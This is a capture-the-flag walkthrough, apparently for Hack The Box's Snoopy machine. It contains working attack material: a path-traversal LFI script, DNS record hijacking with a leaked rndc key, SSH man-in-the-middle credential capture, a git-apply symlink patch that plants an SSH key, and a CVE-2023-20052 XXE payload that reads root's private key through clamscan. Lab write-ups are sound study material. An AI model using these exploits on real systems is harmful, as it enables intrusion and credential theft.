## Nmap

```
Nmap scan report for 10.10.11.212
Host is up, received echo-reply ttl 63 (0.070s latency).
Scanned at 2023-08-03 16:21:12 EDT for 15s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 ee:6b:ce:c5:b6:e3:fa:1b:97:c0:3d:5f:e3:f1:a1:6e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEwa6lTzS8uZRb7EebEXbLkAU0FpJ8k9KO+YwTTeEE7E3VgGZr4vOP4EOZce1XDgwR18wt0WOCiYz6pi6M4y4Lw=
|   256 54:59:41:e1:71:9a:1a:87:9c:1e:99:50:59:bf:e5:ba (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEZTgpF2zR6Xamvdn+NyIUGFtq7hXBd7RK3SM00IMQht
53/tcp open  domain  syn-ack ttl 63 ISC BIND 9.18.12-0ubuntu0.22.04.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.18.12-0ubuntu0.22.04.1-Ubuntu
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: SnoopySec Bootstrap Template - Index
| http-methods: 
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## WEB Enum

We can download files.

![](img/Pasted%20image%2020230803163402.png)

Also there is a message in contact form.

![](img/Pasted%20image%2020230803162634.png)

## DNS Enum

`dig axfr @10.10.11.212 snoopy.htb`

![](img/Pasted%20image%2020230803162437.png)

Add subdomains `/etc/hosts`.

```
10.10.11.212    snoopy.htb mm.snoopy.htb mattermost.snoopy.htb postgres.snoopy.htb provisions.snoopy.htb www.snoopy.htb
```

## LFI

There is a LFI vuln but the files are download as zip so we need to decompress.

![](img/Pasted%20image%2020230803163852.png)

Using next script we can read files.

```python
import requests
from zipfile import ZipFile
from io import BytesIO

while True:
    url = "http://snoopy.htb/download?file=....//....//....//..../"
    local_file = input("File: ")

    response = requests.get(url + local_file)

    if len(response.text) != 0:
        temp_zip = ZipFile(BytesIO(response.content))
        file_name = temp_zip.namelist()[0]

        for line in temp_zip.open(file_name).readlines():
            print(line.decode(), end="")
    else:
        print("File doesn't exist or you cannot access it")

    print("\n")
```

![](img/Pasted%20image%2020230803170941.png)

## DNS Key

Using LFI we get secret key for dns `/etc/bind/named.conf`.

![](img/Pasted%20image%2020230803172714.png)

```
key "rndc-key" {
    algorithm hmac-sha256;
    secret "BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=";
};
```

## DNS Update records

Add dns record.

```
nsupdate -k key.txt
server 10.10.11.212
zone snoopy.htb
update ADD mail.snoopy.htb 30 IN A 10.10.14.156
send
```

![](img/Pasted%20image%2020230803174025.png)

## Reset password

Set up smtp server with python.

`python3 -m smtpd -n -c DebuggingServer 10.10.14.156:25`

![](img/Pasted%20image%2020230803174231.png)

Go to next URL `http://mm.snoopy.htb/login` to reset password.

![](img/Pasted%20image%2020230803173242.png)

Reset password of `cbrown@snoopy.htb` that we get from `/etc/passwd`.

![](img/Pasted%20image%2020230803174326.png)

We get password reset URL.

![](img/Pasted%20image%2020230803174658.png)

We need delete `3D` and second `=`.

![](img/Pasted%20image%2020230803175052.png)

Now we can access.

![](img/Pasted%20image%2020230803175202.png)

## SSH MITM

There is a special commands.

![](img/Pasted%20image%2020230803175638.png)

The window is open and put next information.

![](img/Pasted%20image%2020230803182244.png)

Before to sent data we need setup this.

```
ssh-mitm server --remote-host snoopy.htb
socat TCP-LISTEN:2222,fork TCP:127.0.0.1:10022
```

![](img/Pasted%20image%2020230803180501.png)

Now we can sent data and get user and password.

![](img/Pasted%20image%2020230803191043.png)

## SSH Connect

`ssh cbrown@10.10.11.212`

```
cbrown : sn00pedcr3dential!!!
```

![](img/Pasted%20image%2020230803191255.png)

## Priv Esc User

![](img/Pasted%20image%2020230803191330.png)

## Git apply patch exploit

```bash
cd /tmp
mkdir doom
cd doom
git init
ln -s /home/sbrown/.ssh symlink
chmod 777 /tmp/doom
```

```bash
echo "diff --git a/symlink b/renamed-symlink
similarity index 100%
rename from symlink
rename to renamed-symlink
diff --git a/renamed-symlink/create-me b/renamed-symlink/authorized_keys
new file mode 100644
index 0000000..039727e
--- /dev/null
+++ b/renamed-symlink/authorized_keys
@@ -0,0 +1 @@
+ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBVjj94rFJoi8gYvcfBCN82RFqnVDQbeB8j3WRsuh67n root@kali" > patch
```

![](img/Pasted%20image%2020230804132119.png)

`sudo -u sbrown git apply -v patch`

![](img/Pasted%20image%2020230804132258.png)

`ssh sbrown@10.10.11.212`

![](img/Pasted%20image%2020230804132344.png)

## Priv Esc Root

![](img/Pasted%20image%2020230804134128.png)
## DMG exploit

Create exploit file.
```
docker run -v $(pwd):/exploit -it cve-2023-20052 bash
```

```
genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
```

```
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/root/.ssh/id_rsa"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg
```

![](img/Pasted%20image%2020230804134816.png)

Copy `exploit.dmg` from container to host machine.

![](img/Pasted%20image%2020230804134638.png)

Sent exploit to victim machine.

`scp exploit.dmg sbrown@10.10.11.212:/home/sbrown/scanfiles/exploit.dmg`

![](img/Pasted%20image%2020230804134948.png)

Run command.

`sudo clamscan --debug /home/sbrown/scanfiles/exploit.dmg`

![](img/Pasted%20image%2020230804135149.png)

![](img/Pasted%20image%2020230804135230.png)

SSH connect.

`ssh -i root_rsa root@10.10.11.212`

![](img/Pasted%20image%2020230804135340.png)

## Resources
https://github.com/ssh-mitm/ssh-mitm \
https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md#Git \
https://github.com/nokn0wthing/CVE-2023-20052